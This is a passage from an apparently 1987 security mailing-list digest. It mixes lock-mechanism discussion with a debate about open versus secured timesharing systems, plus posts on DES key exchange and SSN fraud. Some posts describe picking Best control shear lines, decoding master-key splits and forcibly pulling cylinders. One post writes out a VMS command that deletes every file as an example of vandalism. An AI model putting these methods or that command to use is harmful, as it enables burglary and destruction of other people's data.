sector of the community with very special needs (such as to run the big name packages, for example last I looked it was hard to get a paper published in medical fields that didn't present its statistics as having been produced by one of a few well known packages.) Hence people are simply going out and buying their own systems in droves and, for the more ambitious, purchasing servers of their own to help integrate an environment of quite a bit of power. The last stand for the computing center is the network, it's the last bit of centralized service that anyone is interested in getting from them. I notice that many of them have a lot of trouble with the fact that they cannot produce accounting charges for ethernets. So they find other ways to bang people over the head with the cable (restrictions in gateway software, per-port charges etc.) It's all futile really and just a tragi-comic last hurrah for the vested oligarchy. People I speak with will gladly build their own little networks etc, even if they're less effective, if the central organization becomes too overbearing with their backbone. I guess what I'm saying is that RMS's note is true but technology has removed most of the motivations. No one views the central computing facility as having the good toys anymore, envy is gone, heck, interest is gone, we've developed a whole breed of people here now who have never even used the central facilities (around here that would be a shocking statement in the right crowd.) Most of these folks correspond very closely with the sort of crowd who would have produced the hackers (eg. computer science, computer engineering etc.) -Barry Shein, Boston University From: ron@topaz.rutgers.edu (Ron Natalie) 11-Nov-1987 17:40:19 To: misc-security@RUTGERS.EDU Subj: [201] Re: hotel deadbolt hacks Not against fire regs to my knowledge. Firemen don't use keys. From: shore@epiwrl.epi.com (John Shore) 11-Nov-1987 19:00:06 To: misc-security@uunet.uu.net Subj: [388] IR detector recommendations? I want to install an IR-detector with @al horn to improve the security in a small business office. Is there a brand that does the job reliably and that doesn't cost too much? js - John Shore shore@wrl.EPI.COM ...uunet!wrl.epi.com!shore From: brock@pnet01.cts.com (Brock Meeks) 11-Nov-1987 19:01:58 To: crash!security@rutgers.arpa@bass.nosc.mil Subj: [878] Picking locks on pay phones Here in San Diego we've had an unusual round of news reports about "a man with a pony-tail" that is "the only known person in the U.S. that can pick the lock on pay telephones. He is known to frequent Country and Western bars and carry large amounts of change." He is said to reap about $2,000 a day from his "speciality." The police say there are "tell-tail scratch marks" on the phone lock boxes. Question: Is there any truth to these news stories? Is it possible that only one person in the U.S. can pick the lock on a pay telephone? If so, what makes these locks so damn hard to pick. (And, in what sounds like an easy way to pick up a good piece of spare change, why isn't this activity more widespread?) From: *Hobbit* 11-Nov-1987 06:28:48 To: security@RED.RUTGERS.EDU Subj: [3461] Iwamoto's lock questions Well, the first one with the dimples [I forget the name -- K-something] is relatively straightforward; the dimples simply push pins outward from the keyway certain distances like a regular pin lock. The pins protrude into the keyway from a couple of different directions; the theory being that such a configuration is harder to pick. Well, they tried. The severe limitation here is the number of cuts per pin -- the total travel isn't that far, so you can only have three or four distinct cuts [i.e. dimple depths] per pin. They compensate by using more pins. A similar method is found in Fichet cylinders, which use a key with an H-shaped cross section to address four rows of pins. The other kind, with the slanted cuts, are Medeco or Emhart. Ahh, Medeco. I've recently had an in-depth go-round with a few of these myself after they installed them on my office area. These are in theory "unpickable", because of a rather complex sidebar system and lots of "false" positions that the parts can get into but still not open the lock. The configuration is similar to a standard pin-tumbler lock in that you have pins and drivers as usual. The difference is that the pins are chisel-cut, so that when they drop into the V-shaped key cuts they are forced to rotate to conform to the cut orientation. Into the right side of each pin are milled one or more vertical slots, about .025 inch deep for the "real" slots and less for the false ones. Located just to the right of the pins is a sidebar which normally protrudes into a slot in the shell. The sidebar has six little flat teeth, each of which sticks through a small hole directly at the side of each pin and each of which is slightly narrower than the pin slots. If the pins are rotated such that all the deep slots line directly up with the sidebar teeth, the sidebar can fully retract into the plug, allowing it to turn. If any tooth encounters the side of the pin, or even a false shallow slot, the sidebar blocks rotation. All this is in *addition* to the regular pin-driver action, which is further confused by liberal use of mushroom drivers and funny shapes at the top of the pins. The pin tops are slightly beveled so that they bear against the driver with a small contact area. This allows easier rotation. However, all this is perhaps not as hairy as it sounds. The rotations are limited to zero and plus/minus 30 degrees or so. I believe there aren't a lot of different cut heights, either. While ding near impossible to pick, it's possible to fool with it until it cocks over into some false positions. At this point it's possible to get some information about the insides. Very occasionally someone does get lucky and successfully picks one open, but not at all repeatably. The blanks for these are usually restricted, the cut keys are registered with the company and have "do not duplicate" stamped all over them, and not every place that does keys has a Medeco machine, which is apparently expensive. Creative sheet metal work can get around this, but the tolerances involved are quite exacting. One thing Medecos have going for them is that they are *very* nicely machined; if you removed the sidebar assembly from one it would still be a pretty decent lock. [Note that if you remove the sidebar, pin rotations no longer matter.] _H* From: Bill Sommerfeld 11-Nov-1987 20:36:50 To: Nick Papadakis <@eddie.mit.edu:nick@MC.LCS.MIT.EDU> Subj: [3831] Re: Why secure systems? [You wanted flames.. Here comes one ] Stallman's comments may make sense for a small, cooperative community, where everyone has a chance to know everyone else, and everyone involved has at least some interest in the "common good". However, not all computer-using communities are like this, and there are very good _economic_ reasons (involving the cost of hardware) why many cannot be set up this way. Computer security is somewhat like locks on doors; it isn't perfect, but it serves to deter vandals. Most people can't get through them without keys. People who can get through locked doors generally fall into two categories: responsible (locksmiths), and irresponsible ("criminals"). [There is also a very small group of "amateur locksmiths" in the middle who have some of the skills necessary, are officially part of the criminals, but only apply the skills for "exploration" of interesting areas. These people may make up a fair proportion of this list, but are probably not a significant proportion of society at large; in any event, they generally do no harm to society]. To argue that removing locks is the best way to eliminate crime makes no sense. Perhaps it would work in a truly cooperative ``socialist'' society, where everyone put the good of the whole ahead of personal gain. There are examples of small groups where this holds to a certain extent (for example, a typical family unit), but there are very good reasons why a large-scale version of such a society, cannot exist. What does this have to do with computer security? What it boils down to is that the shared use of any resource (includiing computers) by a group of people who do not have a compatible set of goals requires some form of internal compartmentalization or ``security''. For example, think about a timesharing system or shared fileserver being used as part of a class. It is certainly in the interest of the students to prevent others from destroying their work. It may be in the interest of the students to _not_ allow other people to copy their work (at least, not without permission); it is certainly in the best interests of the teacher to provide a means to limit un-credited plagiarism. If the class involves individual work, then the solution is simple - have everyone put all their work on removable media, which they can carry around with them. If, on the other hand, the class involves work in small teams (as is the case in the software engineering and compiler courses around MIT), the use of removable media makes cooperation impossibly hard, and there needs to be some way to set up common file space which only the group members should be able to access. A security/protection system which prevents people from doing work is clearly counter-productive; studies have shown that programmer productivity increases when there are no internal security barriers which get in the way. The key is to design a security system which provides enough flexibility and is easy enough to use so that it doesn't get in the way of people trying to do work. Of the systems which I have used, Multics comes the closest to this goal [1]. There are far too many poorly designed protection systems out there -- UNIX is one of the really bad ones. Bill Sommerfeld (MIT '88) MIT Project Athena [1] Multics AIM (the access isolation mechansim, a non-discretionary access control system), is the only big wart -- it was designed to prevent trojan horses from letting classified information escape, and instead is probably a big waste of the users's time. It was also kludged in after the original design. Fortunately, it doesn't have to be used. From: 12-Nov-1987 00:41:33 To: security@red.rutgers.edu Subj: [1246] Student Lab Security and Preventing Trojan Horses We have an interesting solution to the problems of preventing 1. software theft from student labs, 2. surreptitious patching (Trojan horses). Application software is stored in an encrypted form. A special loader takes the encrypted image, decrypts (thus verifying), loads, and starts it. As an added bonus, the loader may also record accounting information. The loader must provide its own security by 1. verifying it is not running on a pirate machine, 2. not divulging the encryption password, even under interrogation, 3. ensuring that its own image has not been patched. Students may copy software, since it is useless without the loader. An image can only be modified if both file security was compromised *and* the intruder can decrypt, patch, and re-encrypt the image. The procedure is almost transparent. The user must prefix the usual command with the name of the loader, for example, if the loader is called "RUN", the user must type "RUN VISICALC". Derek Andrew, U of Saskatchewan, Andrew at Sask on BitNet/NetNorth From: Jeffrey Del Papa 12-Nov-1987 14:49:30 To: marks@Sun.COM Subj: [579] re: master keys > Talking about master keys and such, has anyone seen a type of > key that has no teeth and it is just a straight piece of metal? those sound a lot like one of the old sargeant systems. basically what they had was three intersecting sets of pins 120 degrees apart, the idea was that you had to pick 3 sets to get in, without any guides for the pick. The weakness was that the keyhole was large enough to allw easy mutiliation of the pins. From: rutgers!.csc!im4u!ti-csl!dnichols@uunet.uu.net (Dan Nichols) 12-Nov-1987 16:04:16 To: uunet!misc-security@uunet.uu.net Subj: [953] Home security I just had my home burglarized last weekend and am now looking into various ways to prevent or at least deter this from happening again. Has there been any previous discussions about this? If not, how about getting one started? Does anyone have any personal experiences with security services? The options seem to range from $3000 monitored systems down to timers for your lights and a dog in the yard. I have two young children and a cat and small dog which make a motion detector pretty unusable. Any ideas? Dan Nichols USENET: {allegra,ihnp4,uiucdcs,sun} !convex!infoswx!ti-csl!dnichols POB 655474 M/S 238 ARPA: Dnichols%TI-CSL@CSNet-Relay Texas Instruments Inc. CSNET: Dnichols@Ti-CSL Dallas, Texas VOICE: (214) 995-6090 75256 From: NESCC%NERVM.BITNET@wiscvm.wisc.edu (Scott C Crumpton) 12-Nov-1987 16:29:01 To: SECURITY@RED.RUTGERS.EDU Subj: [1404] PC security There are several systems on the market that will provide a security function for a PC with a hard disk. Some of these systems are quite sophisticated; including such features as user authentication, user login and program usage audit trails, access controls for files and directories, data encryption, access controls for the floppy drives, etc. I have a system called ENIX.SYS from VuTek on my PC at work. Unfortunately, it's an orphan now. One of the features that it had that would be particularly useful in the PC lab was the ability to create directories that were execute only. Definitely a deterrent to software theft. ENIX.SYS is a hardware based system with a device driver to interface to DOS. Currently, I am only using the hardware to prevent unauthorized persons from using my PC, the rest of it isn't of much value on a single user system. I was using the automatic data encryption feature, until the first time I ran Disk Optimizer and totally scrambled my hard disk. Anyway, these systems do work. But you need to be very careful in selecting one. I would definitely require an evaluation unit before purchasing one. Prices range from $200 to $2000 per PC, it all depends on how much the data/programs are worth. ---Scott. From: mason@oberon.lcs.mit.edu (Nark Mason) 12-Nov-1987 16:39:42 To: IWAMOTO%NGSTL1%eg.ti.com@relay.cs.net, security@RUTGERS.EDU Subj: [1345] RE: the KEY Discussions The first lock you mentioned, a seemingly blank peice of metal with dimples cut in the side is most likely a Kaba or Dom. They work the exact same way as a regular lock except instead of the pins pointing top to bottom they point side to side and the dimples cut to varying depths substituted for the notches in the top of a conventional key. This way there can be more than 1 set of pins. I have seen then with 4, more could be done easily. The second type is a medeco. The notches in the key are cut at an angle, there are 3 orientations labeled Left, Right and Center. The pin that contacts the key is wedge shaped instead of pointed, so the pin has to be in the rght orientation as well as the right height. Each pin has a notch in the side of it, when they are all at the right orientation the notch is pointing perpindicular to the lock. There is a bar in the side of the lock that has fingers that fit into each of the holes. When the pins are all at the right orientation all the fingers slide into the slots, the bar slips to the left and if the pins are all at the right height as well the lock can be opened. Medecos are effectively pick proof. Nark From: gwyn@brl-smoke.arpa (Doug Gwyn) 12-Nov-1987 17:36:05 To: misc-security@uunet.uu.net Subj: [1137] Re: mastered systems >Similarly, if you're going to try and determine the master combo for a given >system, you do need to take at least one example apart. Actually, if you have an operating key, you need not remove the lock cylinder in order to determine all the pin splits in it. Obtain one extra key blank per pin column (7 for the typical institutional Best lock); duplicate the operating key except for one column on the blanks, omitting a different column on each blank. Then, for each blank, try it with the omitted column cut to number 0 (high), then 1, then 2, ... and record which bittings open the lock. That tells you what the splits are in that column. The whole set of trials tells you what all the splits are in all columns. The best way to cut the keys is with a code machine; next best is to duplicate from a depth key set; third best is to set up an extra cylinder plug with just one pin of the desired length in the appropriate column, and file down the key until it brings the pin flush with the plug. From: Jose Rodriguez 13-Nov-1987 09:29:49 To: security@red.rutgers.edu Subj: [1965] something of some interest, subject: breaking DES Subject: Authentication protocols Date: Thu, 12 Nov 87 12:19:21 -0500 From: Craig Partridge Something to think about when using DES.... Date: 12 Nov 1987 11:11-EST From: Eric.Cooper@spice.cs.cmu.edu To: end2end-tf@venera.isi.edu Subject: RE: Breaking DES Here's Evi's response when I asked her a week or so ago: Date: Fri, 30 Oct 87 19:32:32 MST From: evi@boulder.Colorado.EDU (Evi Nemeth) To: Eric.Cooper@SPICE.CS.CMU.EDU Subject: Re: DES breakthroughs? the break is in the diffie hellman key exchange for des based on 127 bits. it was done quite a while ago, solving the discrete log problem for the field 2 ** 127 -1. the work was with ron mullin at the university of waterloo. the actual implementation of the algorithms was done on the denelcor hep supercomputer (since defunct) in 1984. there were several technical papers by mullin and by coppersmith at ibm yorktown on the method of attack. our paper on the implementation which includes a description of the algorithm but not the gory details, was in the proceedings of the international conference on parallel processing in the summer of 1984. i can send you a copy if you dont have access to the proceedings. the paper actually won the best paper award at that conference, no $$, but i got a plaque for my wall and denelcor sold a machine to nsa. the reason i mentioned it to van was that sun has now done two talks at meetings about their security on the network that is based on des using the diffie hellman key exchange in exactly the field that we broke. both times the talk was given by the programmer who is implementing it not the mathematician who decided what to be implemented. i pointed them again to the papers on it; hope a number theorist there actually reads them. evi From: 13-Nov-1987 11:17:37 To: security@red.rutgers.edu Subj: [463] RE: Bumper Beepers. And by the way, US Citizens have no reasonable expectation of privacy regarding movements tracked in public, said the Supreme Court in 1983: US v. Knotts, 103 S. Ct. 1081 (1983). However, I imagine that installing a beeper on someone else's car without their knowledge or permission is trespassing at the very least. Ed From: rogers@marlin.nosc.mil (Rollo D. Rogers) 13-Nov-1987 15:56:12 To: @eddie.mit.edu:nick@MC.LCS.MIT.EDU Subj: [1754] Re: Why secure systems? Well, as a Computer Security person i look at this a little differently to say the least. There may be some system admin or security people that run a very tight ship(computre system wise). However, i agree that the users must be able to get their work done in a timely and efficient manner. But i have a problem with just making it an "open" system for just anybody to access. In the DOD we have systems that store and process National Security Info as well as Sensitive and Privacy Act data. Certainly we have the right to insist that users have a need-to-know for these type files stored on a given system. A user also has the right to decide which other users are going to be allowed access to the files he/she creates. We just cannot open up all the data on the system to every user just because they think it would be "nice"! There is a serious problem now with the management of the SUPERCOMPUTER systems in the U.S., as the universities want to open the system up to any scientist user in the world(including the users in the USSR). This can be a real problem since these computers can be used for military weapons APPLICATIONS. Should we deny this type of user access to these powerful tools? In conclusion, i think that we have to strive for a happy medium while trying to balance the need for Computer Security with the users requirement to get the job done. But if i am going to err, it will be on the side of Computer Security and the protection of data stored on the system! As the saying goes, 100% security equals 0% productivity!! REgards, Rollo Rogers, ADP SECURITY From: UJ0%psuvma.bitnet@RUTGERS.EDU 13-Nov-1987 23:40:45 To: rutgers!misc-security@e.ms.uky.edu Subj: [398] Infinity Ever heard of an "Infinity Transmitter"? It allegedly would allow the user to dial a phone number and disconnect the ring. By amplifying the signal, it would allow the user to eavesdrop anywhere where there was a phone. I heard that they exist, but maybe not... Paranoia From: Jonathan Harris 14-Nov-1987 00:16:33 To: security@RUTGERS.EDU Subj: [795] SSN In reply to the few examples people brought up of how someone can destroy you with a knowledge of your SSN: (1) The activities--getting the false drivers license, using it to obtain information about you, etc... are all serious criminal offenses. The abuser would cause you some hassles, which you would eventually clear up, and eventually find himself in jail with felonies on his record, drunk driving, etc... The reissue of the drivers license would certainly show up on the public record and be evidence in your favor. (2) If he really wants to be that nasty there are much easier ways then that to cause you trouble. ie. vandalize your house or car. ---JOnathan From: gwyn@brl-smoke.arpa (Doug Gwyn ) 14-Nov-1987 18:03:39 To: misc-security@uunet.uu.net Subj: [756] Re: Yet more about SS numbers Strange how none of the posted responses noted the root problem, that there is seldom any verification that a person is who he claims to be. Some people have several SSNs to take advantage of this situation and maintain multiple "identities". I wish there were a definitive court case that would throw out any evidence compiled against an individual without every entry being validated, for example by fingerprint matching. Surely we have the technological capability to perform accurate personal identity validation; it wouldn't be much more elaborate than the current credit-card-authorization-by-modem scheme. From: *Hobbit* 19-Nov-1987 06:23:35 To: security@RED.RUTGERS.EDU Subj: [628] mister pay phone If they know so much about this guy, why isnt he in the klink already? Pay phones generally use lever locks. These were invented ages ago, before the pin-tumbler, and are still in use on things like phones and safe deposit boxes. A properly constructed one is extremely difficult to defeat; there are numerous false or "confuser" notches built in, and very specialized tools are probably required. It would seem more likely that this guy knocked over a coin collector and stole his key ring. _H* From: warren@xanth.cs.odu.edu (Frank F. Warren Jr.) 15-Nov-1987 14:43:05 To: misc-security@mcnc.org Subj: [566] Re: Internal setscrews >Does Medeco or Abloy have any such mechanism? *That* would make things >pretty difficult... Yes, Medeco does produce interchangable core cylinders compatable with certain Yale housings. Frank Warren, Jr. Old Dominion University - Norfolk, Virginia warren@xanth.cs.odu.edu Old Arpa: warren%odu.edu@RELAY.CS.NET warren@xanth.UUCP old uucp: {decuac,harvard,hoptoad,mcnc}!xanth!warren Packet: KB4CYC@WD4MIZ From: quintus!gregg@Sun.COM (W. Gregg Stefancik) 12-Nov-1987 18:03:09 To: security@red.rutgers.edu Subj: [945] Picking the Best control shear According to some books on the subject of interchangeable cores it is possible to pick the control shear only by applying tension to the control sleeve only. By applying tension to the control sleeve only, the pins will only bind at the control shear. You may ask, how does one apply tension to the control shear? Best cores have holes in the core sleeve for ejecting pins, one merely modifies a tension wrench to fit into one of these holes such that it only contacts the control sleeve (the upper most sleeve layer). If your wrench goes into the hole too far you will be applying tension to the entire core assembly which will get you no where fast. I have yet to try the above technique, but logic seems to say that it should work. Gregg Stefancik Professional Security Consultant From: Matthew Hull 17-Nov-1987 02:14:53 To: SECURITY@RUTGERS.EDU Subj: [14206] Computer Security Systems I think that for the first time since I signed into this SIG I may be able to contribute, since opinions are cheap and I have many and no knowledge is required ;-) But before I do I'd like to cover my *ss a bit by clarifying that I understand that the opinions expressed were not necessarily those of Mr. Papadakis' and that any references to 'you' are probably the universal 'you' or to those who disagree with my opinion. I'd also like to deny permission to all persons to use this message, and any reply messages which contain references to it, to my detriment by bringing it to the attention of my employer (either directly or indirectly). [Hey, it can't hurt.] _Part_One_ >If you look at the social organization of the users on a typical >timeshared computer of today and compare it with other social groups, it >most resembles the Soviet Union. It is pervaded by suspicion, ruled >arbitrarily by a small oligarchy, and hostile toward outsiders. This >arouses resentment, which inspires the security crackers. But the >authoritarian social organization itself is a worse problem than the >crackers are. I must confess that this rings truth to me. It _does_ resemble a totalitarian organization. As a means for an efficient execution of the tasks which a computer is typically used to perform, this form of organization is a natural answer to the problem at hand. Doesn't make it right, but it _is_ efficient. Usually, the running of a computer system centers around making sure a known set of programs executes as needed. Additionally, the administration is responsible for the development of new programs and to maintain the existing system in response to dynamic needs as defined by the owner of the computer. The oversight of a running system is relatively simple and easy compared to maintenance and development, and requires no more sophisticated form of organization than the totalitarian one which typically exists. That is _why_ it exists (or at least one reason). The second main task, maintenance and development, figures a smaller role in the system of things (although it gets far more notice), and can also be handled efficiently by "a small oligarchy." Does efficiency justify the occasional unfairness implicit in an organization where the few rule the many? Probably not, in a theoretical sense. But in a practical sense, things are different. You can use a political organization as an allegory as convenient, but remember it is _only_ an allegory; and perhaps, not a very good one. In a political structure the assumption most Americans assume is that the organization exists to serve the people. This is not necessarily the case with computer organizations. In the political world many have adopted the idea which exists in our own Constitution that man has by natural law a certain set of inalienable rights which it is the responsibility of the political organization to defend and ensure. This is certainly not the case in a time-sharing computer organization. The users are using a machine owned by a 'legal entity' (ie. a person, a company, the State or National government) and are not participating in anything as basic as the right to a free and peaceful life. The users _do_not_ have a certain set of inalienable rights granted by natural law in the use of a someone's computer, and cannot expect treatment similar to that given them by their political government. This means that if you are repressed, you _do_not_ necessarily have the right to object. If you are not among the privileged few, you _do_not_ necessarily have the right to rant and rave your inequality, nor expect that things will (or even should) change for your approval. In sub-conclusion, whereas the typical organization is similar to a totalitarian government, you do not have any natural right to expect or demand 'better' treatment. _Part_Two_ >Most computer users see no alternative. I am fortunate in having >experienced one. At the MIT laboratory where I have worked as a >researcher for ten years, our old computer system treated users as free >equals with a responsibility to cooperate, and guests were welcome. Our >hospitality guided clever young people to become responsible engineers >rather than crackers. >The software on most computer systems is designed to support the ruling >class just as surely as the KGB is. The software written and used by >the hackers at MIT was designed to make users free and equal. Our >system had no restrictions that could be imposed on selected users; all >users were treated alike. Thus nobody could seize power by restricting >everyone else. We did not care whether a change to the files was >authorized; we cared whether it was an improvement. This can only be >decided by human beings, on a case-by-case basis. So, rather than >having file protection to control changes, we called for discussion >of any planned change. These paragraphs, and most of the rest of the excerpt, argue that a 'free system' is better than a traditional system with restrictive security measures. For 95% of the world's computers, this is simply not true. And perhaps Stallman would agree: "We should put military secrets, bank records and the like on computers with strict security. For other activities, we should have computers that are free of security, and free of its burdens." The trouble is that almost all systems consider their data just as important and confidential as any bank. And I argue that they _should_ have the right to decide how confidential their data will be, using strict security, because it is _their_ computer. Now, if you restrict your generalization of "a typical timeshared computer" to computers used for educational purposes, with no data of any sensitive nature, then the argument immediately becomes more tolerable. Presumably, with no sensitive data to protect, the administration which owns the computer should allow the users a 'free system' in which to work and learn. The users in this 'free system' would be responsible to no one for their actions, would have free access to all files of any nature, would be able to allocate resources on a first come, first serve basis, and would not be limited in the content and use of their files and programs. And such an environment would be conductive to the growth of "responsible engineers rather than crackers." This sounds very nice, and would likely be quite acceptable in an environment of responsible engineers, but when put into an environment of 18 - 22 year old students at a typical university, comes out only as the pipe dreams of an old UNIX hacker (pun intended). At this university, which I judge typical, there _are_ people who would delete a person's files given the opportunity. Maybe the computer users at MIT were exceptionally considerate, but at the typical university the typical user is a student using the computer only for the word processor, and has little knowledge and less respect for the computer, it's structure, and it's users. Nevertheless, I suspect that vandalism would still be rare (my basic optimism in humanity :-)) but when it did occur it would be drastic ( $ Delete *:[*]*.*;* ). Should such disasters be _allowed_ to occur? More often, I suspect, would be the individual disasters where Mr. X gets Mr. Y pissed off, and Mr. Y is a total jerkface, so Mr. Y deletes, or worse, encodes, all of Mr. X's files. Perhaps a user prefers that his resume, and his letters to his wife, etc., are not available to the general public? Should we be limited to simple trust that no one will look into his private directory of files? There are problems in all of the freedoms in your free system, not simply the obvious one concerning file protections. You let slip an indication of a potential problem in your article: "And if a stranger came to the lab and wanted to play with the computer when it was not fully needed by us--we let him!" ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ What's this I read? Who is "us?" Some of the users who are all treated alike? How can anyone "let" another equal user use what is rightfully his to use as an equal user? Oh, he's a "stranger." How can he become one of the equal users? Popular election? Have him pass a test? Require n number of hours of computer use? Pardon my sarcasm, but what is obviously needed in this case is an authority-- some person or group of persons whose responsibility it is to initiate strangers into users. This authority is also necessary to resolve an innumerable list of potential conflicts among users, even if they do all behave as responsible engineers. Who is to decide the needs of the many users of the computer? Who is to tell Mr. Y that he has used the printer long enough? Who is to tell Mr. Y that his Graphic simulation is very nice, but it takes up too much CPU time? And when they do not behave as responsibly, who is to tell Mr. Y that his Random Write program (which he uploads from floppy on occasional bad moods) is improper and destructive use of the computer system? Who is to tell Mr. Y that the female students (as a whole) do not appreciate his little pictures which he mails to them, or causes to print to their screens when they log in? Who is to tell Mr. Y that if he doesn't stop being a total jerkface, he won't be allowed to use the computer anymore? You _need_ some form of authority beyond and _above_ the normal abilities of the regular user, with the power to enforce it's decisions against a user who may not agree with them. This is what 'security' does. It also prevents Mr. Y from ever being able to do his misdemeanors before any damage is done. It protects the integrity of those files which the file owner desires to remain safe, while still allowing freedom where it is desired. It protects the ignorant from their own errors, and it protects others from a user's ignorance. And best of all, it _can_ be turned off if the protection is _not_ wanted. But many of the system level protections, such as file quotas, are in the domain of the group with authority which governs and protects the system. For an educational computer sans sensitive data, the 'group with authority over the system' need not be a small oligarchy resembling a totalitarian state. It could very well be a Bulletin Board program which allows the posting of proposals by users and the analysis of a popular majority rules vote. It could be an elected assembly, with terms of office and specific rights and prohibitions. It could be a single individual determined by the 'most creative use of the system as expressed in Assembly language.' The point is that this kind of computer environment can be governed by any type of organization, so long as the computer is put to effective and proper use as defined by the owner(s) of the computer. A completely free system without protections and without any authority would not serve this purpose. _Part_Three_ >So far the issue of security versus freedom on computer systems affects >mainly computer hackers. But, in the future, computer systems will play >a bigger and bigger role in everyone's life. And these systems will be >built on today's entrenched authoritarian tradition, unless we stop it. >The crackers are a warning sign of a problem that every American is >going to face--soon. Yes, this is at the same time wonderful and scary and sad. And also true. The difference here is that these computer systems _will_ be for the purpose of serving the people, and thus the people should have more of a say in how they will be used, and how they will be governed. The old days of Gripe Logs (public display of user complaints and the responses given by those in authority) will not suffice in these future days, and some provisions for user objections, public access and input towards policy, public 'trials' to determine guilt or innocence for misdemeanors, and a more sophisticated structure of organization with the checks and balances our own government is well known to have will need to be initiated and tested, and finally used in practice. Who knows, the organization which emerges from these public computers may well be used as the template with which new governments are formed in the 'Final Frontier', just as the corporate organization was used as a template for our own budding American government. If such becomes the case, it is my sincere hope that much forethought goes into the development of such a system. And in the interest of _preventing_ a flame war, which is much too violent a phrase, I pose the following question: What constitutes a secure and _just_ security system for a public service computer system (network?) which by definition has significant consequence over the lives of the people whom it serves? One thought that immediately comes to my mind is the old question of who will police the police? How much access should 'the police' have, and how can it be enforced? What system of input would effectively reflect the opinions and attitudes of the people served? How can a process analogous to a judicial system be executed? Can any computer system ever be physically secure, given the range of access needed (public to a large group of people spread over a large area)? I could go on and on and on and on ....... Any thoughts out there that may resemble answers? Matthew G. Hull CSU Information Systems New Britain, CT. 06050 BITNET: HULL@CTSTATEU ps. My apologies to any readers who may object to my generalization of the American government and Constitution as "ours." I mean no implicit criticism towards the government of any other country. From: gwyn@brl-smoke.arpa (Doug Gwyn ) 17-Nov-1987 02:14:53 To: misc-security@uunet.uu.net Subj: [572] Re: Internal setscrews >A certain proportion of the locks in a >large campus system will "default" to the control shear line during picking. Actually, if you're really into Best locks, you should make a special tension wrench that grabs onto the holes in the bottom of the plug sleeve corresponding to the control plug. This makes picking the control shear line fairly easy. Some Best locks use spool pins, but a competent lock picker can cope with that too. From: gwyn@brl-smoke.arpa (Doug Gwyn ) 17-Nov-1987 02:19:44 To: misc-security@uunet.uu.net Subj: [2306] Re: the KEY Discussions >One had no slots, per se. Instead, it essentially looked like a blank with a >number of dimples of differing sizes drilled on both sides of the blank. Sounds like the Sargent KESO system, which soon had some imitators. The blank cross-section is a squashed hexagon, with dimples milled into the flats at positions matching pins in the plug. There were three sets of pins (the key was reversible). All three had to line up their splits along the plug shear line before the plug would turn; otherwise it is just the ordinary Yale tumbler lock principle. The improved security was due to the restricted blank, the difficulty of duplicating or even producing a cut key, and the difficulty of picking three simultaneous shear lines. >In other words, instead of just making the cuts at an angle perpendicular >to the key, the cuts were offset at angles of 0, +5 and -5 from the >perpendicular. Sounds like the Medeco lock. Its pins have wedge bottoms instead of the usual cones; the wedges cause the pins to twist, and since the pins are offset from the center of the plug (if I recall correctly), they have to be properly twisted to align smoothly with the shear line. There are also some systems like this with grooved pins and even more elaborate mechanisms. Don't forget the "sidebar" locks used on current GM automobiles. There is also the Chicago "Ace" lock (with tubular key) often found on vending machines, and variations on that theme, including one with concentric nested pins. All these locks can be picked, with varying degrees of difficulty, by someone who understands their construction and general locksmithing principles, who has or can make the necessary tools, and who is willing to spend the practice time required. There is a common opinion that any lock involving mechanical principles activated by inserting some sort of key into a hole is in theory pickable. The most secure lock systems I know of that are in general use involve "card keys" and have computers that log lock activity. If you couple one of these with some form of personal validation (hand geometry or retinal scan), that's probably the best you're going to be able to do. From: ron@topaz.rutgers.edu (Ron Natalie) 17-Nov-1987 16:01:26 To: misc-security@RUTGERS.EDU Subj: [829] Re: master key security You wouldn't need to do anything as drastic as saber sawing to steal the lock. While you need a change key to remove the core, you can pull the whole cylinder if you have the door open without damaging anything. You then take it home and crack it open. If you don't have a key, you can open the door by some forcible means or you can just rip out the cylinder. There is a device called a K-tool that I have used exactly once. It is a piece of metal that slides over the cylinder. You place the end of a halligan bar into the slot on the K-tool and then hit the whole thing with a heavy object (the flat end of an ax works well). The lock comes out of the door in one easy motion. -Ron From: psw@wolfgang.arpa (Phil Wherry) 17-Nov-1987 20:09:52 To: LINNIG@eg.ti.com, security@RUTGERS.EDU Subj: [2253] Re: master key security I'm a student at the College of William and Mary, and I can say from more-or less first-hand experience that a college administration's reaction is to merely shrug their shoulders and cross their fingers in the wake of a fairly major breach of master key security. Quoting from our campus newspaper, "Richard Cumbee, chief of campus police, reports that a master key to the College is missing. The key was reported stolen November 5 some time between 10am and 1pm, from a key ring left on a Buildings and Grounds supervisor's desk. According to Cumbee, the key can open approximately 75 percent of the doors on campus. Police have a suspect in the case, and have issued a trespassing warning to the individual. Cumbee stated that police have 'no indication of a history of violence associated with this person.' Cumbee also said that, although the key is at this time not recovered, the police have taken several steps to ensure campus safety. The department is monitoring all reports to see if a master key might be involved. Additionally police notified certain areas of the College to keep on the lookout for suspicious behavior. Cumbee added that no locks will be changed at this point." I'm of the opinion that it's about time for the college to give serious thought to re-keying the locks involved. I know it's expensive, but I would think that the risks that they are taking by NOT re-keying the locks far outweigh any short-term expense involved. A question for those more well-versed in the design of a large-scale lock installation: am I correct in thinking that it would be within the realm of possibility for our locksmiths to re-do the master keying in such a way as to avoid the need to cut and issue new keys to residents (i.e. change ONLY the master keying)? Thanks for the information -- and I hope this tale was of some interest. If so, let me know and I'll keep the list updated on what happens. Phil Wherry, The College of William and Mary (student) bitnet: #pswher@wmmvs.bitnet arpanet: psw%wolfgang@gateway.mitre.org $$$$net: 804-220-9156, 804-253-5512 From: johnson%msuhep.hepnet@LBL.Gov (A Loopy Guy) 18-Nov-1987 11:42:41 To: SECURITY@RED.RUTGERS.EDU Subj: [1235] Home Locksmith Courses With all this talk of locksmithing on the net, I thought someone might have an opinion (uh-oh! I'm asking for it) on the worth of the so called 'home locksmith' courses that one sees advertised in magazines. I have been looking into replacing some locks for a small business I am associated with; granted this is not a difficult task in itself, however, this might be a legitimate excuse to learn something about a topic that I have always been interested in. I would rather not spend a great deal (I do not recall the cost) on a home course, unless I would actually get some sort of certification that would be respected (I don't know what that would be-- maybe certification by a National Association of Locksmiths, or something?). Also, if I go through on of these programs, will I be able to purchase equipment as a legitimate locksmith? I don't want to waste my time, I can do that without spending a lot of dough. If anyone has any experience with these courses, or if someone could recommend a better alternative I would appreciate it. Thanks in advance, John Johnson From: Michael Grant 20-Nov-1987 07:08:32 To: security@red.rutgers.edu, telecom@xx.lcs.mit.edu Subj: [574] Re: Picking locks on pay phones I once asked a phoneman emptying one of those safe-like phones about the security of them. He told me that they were alarmed, and that if you open one even with a key at the wrong time, telco will phone the police. I have never verified this though, nor hav I ever ripped open a phone and looked for sensors. Anyone out there had any 